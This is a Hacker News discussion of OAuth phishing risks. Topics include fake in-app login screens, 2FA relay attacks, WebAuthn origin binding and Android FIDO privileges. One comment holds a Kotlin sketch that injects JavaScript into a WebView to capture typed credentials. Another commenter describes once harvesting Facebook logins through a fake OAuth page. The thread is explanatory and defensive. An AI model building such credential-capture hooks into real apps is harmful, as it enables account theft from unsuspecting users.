
I think the trick here was to prompt the user with a fake OAuth screen. Many legit apps show the OAuth screen in a web frame inside the app itself; it's absurd that this is still such a common practice.

If you need to enter your credentials when using sign-in-using-xxx, be VERY cautious. Even if you have 2FA enabled, the fake oauth screen can just ask you for the 2FA code. You have no way of knowing whether the login page is keylogged or hijacked.
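To make the danger concrete, here is a minimal sketch (hypothetical Kotlin/Android code; the CredentialSniffer class and the URL are made up for illustration) of how an app hosting a login page in its own WebView can capture whatever is typed into it, whether the page is a pixel-perfect fake or the real thing:

    // Hypothetical sketch: an app that hosts a login form in its own WebView
    // controls the page completely and can read anything typed into it.
    import android.webkit.JavascriptInterface
    import android.webkit.WebView
    import android.webkit.WebViewClient

    class CredentialSniffer {
        @JavascriptInterface // exposed to page JS as window.Sniffer
        fun leak(user: String, pass: String) {
            // a malicious app can ship these anywhere it likes
        }
    }

    fun showLogin(webView: WebView) {
        webView.settings.javaScriptEnabled = true
        webView.addJavascriptInterface(CredentialSniffer(), "Sniffer")
        webView.webViewClient = object : WebViewClient() {
            override fun onPageFinished(view: WebView, url: String) {
                // inject a submit hook that copies the form fields
                view.evaluateJavascript(
                    """
                    document.forms[0].addEventListener('submit', function () {
                        Sniffer.leak(
                            document.querySelector('input[type=email]').value,
                            document.querySelector('input[type=password]').value);
                    });
                    """.trimIndent(), null)
            }
        }
        webView.loadUrl("https://provider.example/oauth/authorize") // or a fake copy
    }

Note that this works even when the WebView loads the genuine provider page, which is why the safe pattern is handing the OAuth flow to the system browser.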




This is pretty much exactly the question I asked about OAuth 10 months ago:

Something I still don't understand about the OAuth flow is how it's _not_ training users to be more easily phished for actual usernames and passwords. The very first step is "If you are not logged into the third-party, display a login-form from the third-party."

The thing is, you never really know off-hand if you're logged into the third-party (provider) or not without opening a second tab and going directly to the third-party's site, since you're always getting logged out after various timeouts, cookie-clearing, browser-closing, and computer-restarting events.

What prevents an OAuth client application from displaying an OAuth process that shows a fake login form, which looks identical to the provider's login form, to get the user to enter their provider username and password before they realize the URL is off? It seems like it trains users that it's normal for websites to launch a Gmail login form and this is perfectly safe.

https://news.ycombinator.com/item?id=21357370


I think you're right. Users are being trained to enter their passwords and 2FA tokens everywhere with the false promise that 2FA makes it secure. Even U2F using a signed challenge seems iffy to me.

This [1] says "In fact, the spec requires that browsers only expose the API in secure contexts", so if that's correct it's better, but still not good enough.

This [2] looks like it does U2F by grabbing the challenges via browser plugin and relaying them to a phone app for signing.

Trusting the browser to "expose the API in secure contexts" seems like a failure because it's assuming nothing else can collect the credentials or send a challenge to a security key. Is that true? Could I write an app that would phish a user into signing a challenge with their security key?

1. https://security.stackexchange.com/a/206549/134291

2. https://krypt.co


> Could I write an app that would phish a user into signing a challenge with their security key?

What sort of app? A full-blown Windows / OS X / Linux desktop application? Yes.

You definitely should not install software that asks you to interact with your FIDO authenticator in this way unless you really trust it. I trust the OpenSSH packages installed by the operating-system vendor; I would not trust some random GitHub project.

The two big phone ecosystems won't let you talk directly to a third party authenticator or to their built-in platform authenticator. The authenticator talks to them, and they talk to you. So while it would be possible to make a Windows EXE program that says "Touch authenticator to stroke your 3D pet" or whatever and actually steals your Facebook login credential this way, it should not be possible to put something on Google Play or Apple's iPhone store that does the same thing.

Edited to add: For Android at least there is a concept of "Privileged" apps that get to do stuff that is otherwise impossible to ask a user for permission to do. The ability to fill out WebAuthn-style rpId values (for WebAuthn these are Internet FQDNs) is locked behind such a privilege. So, Chrome has privilege, release builds of Firefox have privilege, and so on, but yet another fly-by-night app developer who uploads Flappy Bird clones to the Play Store can't use this feature.

Without this privilege, when you talk to the authenticator (either a platform authenticator or a 3rd-party one) the OS will insist on picking an rpId with a platform-specific prefix. So e.g. maybe your app can ask for rpId android-584fac03:google.com, but there's no way (without privilege) to get just google.com, which is a problem because that's the value you'd need in order to get working Google credentials.
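For concreteness, here's roughly what that looks like through Google Play services' FIDO2 API (a Kotlin sketch assuming the Fido2ApiClient surface; the exact error surfaced on rejection is an assumption). An unprivileged app can ask for any rpId, but Play services validates it against the calling app before anything reaches the authenticator:

    // Sketch (assuming Google Play services' FIDO2 API): an ordinary app
    // requesting an assertion. Play services checks the rpId against the
    // calling app, so "google.com" fails unless the app is privileged or
    // explicitly linked to that domain.
    import android.app.Activity
    import com.google.android.gms.fido.Fido
    import com.google.android.gms.fido.fido2.api.common.PublicKeyCredentialRequestOptions

    fun requestAssertion(activity: Activity, challenge: ByteArray) {
        val options = PublicKeyCredentialRequestOptions.Builder()
            .setRpId("google.com") // rejected for an unprivileged, unlinked app
            .setChallenge(challenge)
            .build()
        Fido.getFido2ApiClient(activity)
            .getSignPendingIntent(options)
            .addOnSuccessListener { /* launch it and collect the assertion */ }
            .addOnFailureListener { /* rpId not allowed for this app */ }
    }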

If you want your app to talk to your own web site, you can build a bunch of extra goop (in Android at least) to enable that, but part of what will happen is your web site's backend code needs to explicitly go "OK, I should allow android-584fac03:my-private-app even though that's nowhere close to my actual FQDN", so that seems safe enough.
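On the server side, that explicit allow can be as simple as an origin allowlist. A hedged sketch, assuming (worth verifying against current docs) that Android FIDO2 assertions report an "android:apk-key-hash:..." origin in clientDataJSON instead of the site's https origin:

    // Hypothetical backend allowlist: accept the app's signing-key origin
    // alongside the site's own origin when verifying clientDataJSON.
    val allowedOrigins = setOf(
        "https://my-site.example",
        "android:apk-key-hash:PLACEHOLDER_BASE64_CERT_HASH", // this app, by signing key
    )

    fun originAccepted(clientDataOrigin: String): Boolean =
        clientDataOrigin in allowedOrigins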


I'd guess it's a fake OAuth screen as well. I coded one of the first (I think) Tinder auto-likers for Android back in 2013, and the only way I could do it was to capture the real Facebook username and password and log into Tinder on the phone in the background. I just put up a fake OAuth HTML page in a webview and saved the login, with a disclaimer of course, but nearly everybody ignored it. I was surprised how easy it all was.


> Even if you have 2FA enabled, the fake oauth screen can just ask you for the 2FA code.

Not all 2FA is “enter a code”; it's a lot harder for a fake oauth screen to send a request to your registered authentication device.

EDIT: this doesn't really help, as a reply points out. OTOH, separate side channel verification of logon from unexpected devices does.


Is it? Couldn't the backend (or even a human attacker) just type the credentials you provide into the real login page, giving you the "tap yes" push notification just the same?


Come to think of it, you're right. I was mentally combining that 2FA method with “new device attempted login” detection, but the latter is usually separate from 2FA. If a login system uses that detection and requires confirmation through a side channel, rather than merely providing informational notice, it will stop the attack (or at least make it easier to stop; a second user mistake or a preexisting side-channel compromise is still possible). If it's just notice, it may at most limit the impact or streamline recovery from the attack.

But now that I think about it, it would make sense to combine new-device notification with push-confirmation 2FA for exactly that reason: you've already got a push channel that takes a confirmation, so flag unexpected devices in that channel as well and it becomes much more secure.
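A rough sketch of that combined flow (all names hypothetical): one push prompt that carries both the approval and the new-device warning, and nothing proceeds without an explicit yes:

    // Hypothetical combined flow: push 2FA prompt that also flags new devices.
    data class LoginAttempt(val user: String, val deviceId: String, val location: String)

    fun handleLogin(attempt: LoginAttempt, knownDevices: Set<String>): Boolean {
        val prompt = buildString {
            append("Approve sign-in for ${attempt.user} from ${attempt.location}?")
            if (attempt.deviceId !in knownDevices)
                append("\nWARNING: this device has never signed in before.")
        }
        // placeholder for the push channel to the registered authenticator app
        return sendPushAndAwaitConfirmation(attempt.user, prompt)
    }

    fun sendPushAndAwaitConfirmation(user: String, prompt: String): Boolean =
        TODO("deliver the prompt and block on the user's explicit answer")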



Yup. Notice that this relay attack can't work against WebAuthn (or its predecessor U2F), which is why everything should do WebAuthn and you should ignore attempts to downgrade you to any other method.

An attacker can replay the legitimate WebAuthn request from the real site, but the signed response will (with statistical certainty) be nonsense when produced from their phishing site, because the browser binds the page's origin into the signed data.

Or they can make their own request, which doesn't help them either: the resulting response isn't valid on the real site they want to sign into, so it's pointless.
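The reason both directions fail is that the browser, not the page, writes the origin and challenge into clientDataJSON, and the authenticator's signature covers its hash. A rough sketch of the relying party's check (naive regex parsing for brevity; real code would use proper JSON and CBOR libraries, and the site name here is made up):

    // Sketch of the relying-party check that defeats both attacks.
    fun clientDataOk(clientDataJson: String, expectedChallengeB64: String): Boolean {
        fun field(name: String): String? =
            Regex("\"$name\"\\s*:\\s*\"([^\"]+)\"")
                .find(clientDataJson)?.groupValues?.get(1)
        return field("type") == "webauthn.get" &&
            field("challenge") == expectedChallengeB64 && // replayed: stale/mismatched
            field("origin") == "https://real-site.example" // phished: wrong origin
        // ...then verify the signature over authenticatorData || SHA-256(clientDataJSON)
    }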


In this case the application shows the real Facebook in a webview, and after the user logs in, it retrieves the session cookie from the webview. How will WebAuthn behave here?


If you can steal the session cookie, and the session cookie is what you needed, then WebAuthn doesn't change anything.


And even if you verify that the OAuth address is correct, you still bear the risk of whether you understand what permissions you're granting and whether Facebook implements them correctly.


Sadly, this wasn't mentioned anywhere in the article.





